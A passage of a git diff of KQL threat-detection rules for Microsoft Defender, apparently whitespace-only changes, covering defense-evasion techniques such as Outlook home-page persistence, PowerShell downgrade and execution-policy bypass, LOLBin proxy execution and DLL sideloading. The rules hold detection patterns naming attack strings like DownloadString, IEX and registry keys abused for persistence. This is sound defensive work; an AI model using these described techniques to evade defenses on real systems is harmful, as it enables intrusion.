@@ -1,11 +1,11 @@
-// Title: Potential Persistence Via Outlook Home Page
-// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
-// Date: 2021-06-09
-// Level: high
-// Description: Detects potential persistence activity via outlook home page.
-// An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1112
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Outlook Home Page
+// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
+// Date: 2021-06-09
+// Level: high
+// Description: Detects potential persistence activity via outlook home page.
+// An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\WebView*") and RegistryKey endswith "\\URL"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql
index bcf744d7..fe33ee24 100644
--- a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql
+++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql
@@ -1,11 +1,11 @@
-// Title: Potential Persistence Via Outlook Today Page
-// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
-// Date: 2021-06-10
-// Level: high
-// Description: Detects potential persistence activity via outlook today page.
-// An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1112
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Outlook Today Page
+// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
+// Date: 2021-06-10
+// Level: high
+// Description: Detects potential persistence activity via outlook today page.
+// An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Today*") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Stamp") or (RegistryKey endswith "\\URL" or RegistryKey endswith "\\UserDefinedUrl")) and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql b/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql
index 1dc9fe8b..0594325f 100644
--- a/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql
+++ b/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql
@@ -1,10 +1,10 @@
-// Title: Potential PowerShell Downgrade Attack
-// Author: Harish Segar (rule)
-// Date: 2020-03-20
-// Level: medium
-// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Potential PowerShell Downgrade Attack
+// Author: Harish Segar (rule)
+// Date: 2020-03-20
+// Level: medium
+// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql
index eae9983e..8d5f1bf8 100644
--- a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql
+++ b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql
@@ -1,10 +1,10 @@
-// Title: Potential PowerShell Execution Policy Tampering
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-11
-// Level: medium
-// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceRegistryEvents
+// Title: Potential PowerShell Execution Policy Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: medium
+// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
 | where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql
index d1456edc..2604f176 100644
--- a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql
+++ b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql
@@ -1,10 +1,10 @@
-// Title: Potential PowerShell Execution Policy Tampering - ProcCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-11
-// Level: high
-// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Potential PowerShell Execution Policy Tampering - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: high
+// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql
index 596765b3..f994a390 100644
--- a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql
+++ b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql
@@ -1,11 +1,11 @@
-// Title: Potential PowerShell Execution Via DLL
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018-08-25
-// Level: high
-// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
-// This detection assumes that PowerShell commands are passed via the CommandLine.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-
-DeviceProcessEvents
+// Title: Potential PowerShell Execution Via DLL
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-08-25
+// Level: high
+// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
+// This detection assumes that PowerShell commands are passed via the CommandLine.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql b/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql
index acc55b06..6c8473d3 100644
--- a/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql
+++ b/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql 
@@ -1,12 +1,12 @@
-// Title: Potential PowerShell Obfuscation Via Reversed Commands
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020-10-11
-// Level: high
-// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential PowerShell Obfuscation Via Reversed Commands
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: high
+// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or 
ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc ")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql b/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql
index e1323e69..2cf3d628 100644
--- a/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql
+++ b/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql
@@ -1,10 +1,10 @@
-// Title: Potential Privilege Escalation Attempt Via .Exe.Local Technique
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
-// Date: 2022-12-16
-// Level: high
-// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation
-
-DeviceFileEvents
+// Title: Potential Privilege Escalation Attempt Via .Exe.Local Technique
+// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
+// Date: 2022-12-16
+// Level: high
+// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation
+
+DeviceFileEvents
 | where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql b/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql
index ae043a3c..349588db 100644
--- a/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql
+++ b/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql
@@ -1,10 +1,10 @@
-// Title: Potential Process Execution Proxy Via CL_Invocation.ps1
-// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
-// Date: 2020-10-14
-// Level: medium
-// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1216
-
-DeviceProcessEvents
+// Title: Potential Process Execution Proxy Via CL_Invocation.ps1
+// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
+// Date: 2020-10-14
+// Level: medium
+// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "SyncInvoke "
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql
index e6ed551a..aec32e87 100644
--- a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql
+++ b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql
@@ -1,10 +1,10 @@
-// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023-08-08
-// Level: high
-// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-08-08
+// Level: high
+// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
index 97b0dabf..3a401884 100644
--- a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
+++ b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
@@ -1,10 +1,10 @@
-// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023-08-02
-// Level: high
-// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceRegistryEvents
+// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-08-02
+// Level: high
+// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Provisioning\\Commands*"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql b/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql
index 9d71d4f4..887036a8 100644
--- a/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql
+++ b/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql
@@ -1,10 +1,10 @@
-// Title: Potential Provlaunch.EXE Binary Proxy Execution Abuse
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023-08-08
-// Level: medium
-// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Potential Provlaunch.EXE Binary Proxy Execution Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-08-08
+// Level: medium
+// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql b/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql
index 57c07bad..98ed62f8 100644
--- a/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql
+++ b/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE
-// Author: @neu5ron
-// Date: 2019-02-07
-// Level: medium
-// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070, attack.persistence, attack.t1542.003
-
-DeviceProcessEvents
+// Title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE
+// Author: @neu5ron
+// Date: 2019-02-07
+// Level: medium
+// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.persistence, attack.t1542.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql b/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql
index 6293493e..827d0d78 100644
--- a/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql
+++ b/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql
@@ -1,12 +1,12 @@
-// Title: Potential Register_App.Vbs LOLScript Abuse
-// Author: Austin Songer @austinsonger
-// Date: 2021-11-05
-// Level: medium
-// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Other VB scripts that leverage the same starting command line flags
-
-DeviceProcessEvents
+// Title: Potential Register_App.Vbs LOLScript Abuse
+// Author: Austin Songer @austinsonger
+// Date: 2021-11-05
+// Level: medium
+// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Other VB scripts that leverage the same starting command line flags
+
+DeviceProcessEvents
 | where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql b/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql
index cc96e8e1..889834e6 100644
--- a/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql
+++ b/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql
@@ -1,12 +1,12 @@
-// Title: Potential Regsvr32 Commandline Flag Anomaly
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-07-13
-// Level: medium
-// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010
-// False Positives:
-// - Administrator typo might cause some false positives
-
-DeviceProcessEvents
+// Title: Potential Regsvr32 Commandline Flag Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-07-13
+// Level: medium
+// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Administrator typo might cause some false positives
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:" or ProcessCommandLine contains " –i:" or ProcessCommandLine contains " —i:" or ProcessCommandLine contains " ―i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql b/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql
index c81f7dec..52c140d9 100644
--- a/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql
+++ b/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql
@@ -1,10 +1,10 @@
-// Title: Potential Rundll32 Execution With DLL Stored In ADS
-// Author: Harjot Singh, '@cyb3rjy0t'
-// Date: 2023-01-21
-// Level: high
-// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-
-DeviceProcessEvents
+// Title: Potential Rundll32 Execution With DLL Stored In ADS
+// Author: Harjot Singh, '@cyb3rjy0t'
+// Date: 2023-01-21
+// Level: high
+// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql b/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql
index 6990e807..7f1b5c6c 100644
--- a/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql
+++ b/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql
@@ -1,10 +1,10 @@
-// Title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
-// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
-// Date: 2022-05-21
-// Level: medium
-// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1216
-
-DeviceProcessEvents
+// Title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
+// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents | where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql
index 76a864cd..04b02374 100644
--- a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql
+++ b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql
@@ -1,10 +1,10 @@
-// Title: Potential Signing Bypass Via Windows Developer Features
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-11
-// Level: high
-// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Potential Signing Bypass Via Windows Developer Features
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: high
+// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents | where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql
index 7b5c2d96..82091f61 100644
--- a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql
+++ b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql
@@ -1,10 +1,10 @@
-// Title: Potential Signing Bypass Via Windows Developer Features - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-12
-// Level: high
-// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceRegistryEvents
+// Title: Potential Signing Bypass Via Windows Developer Features - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-12
+// Level: high
+// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
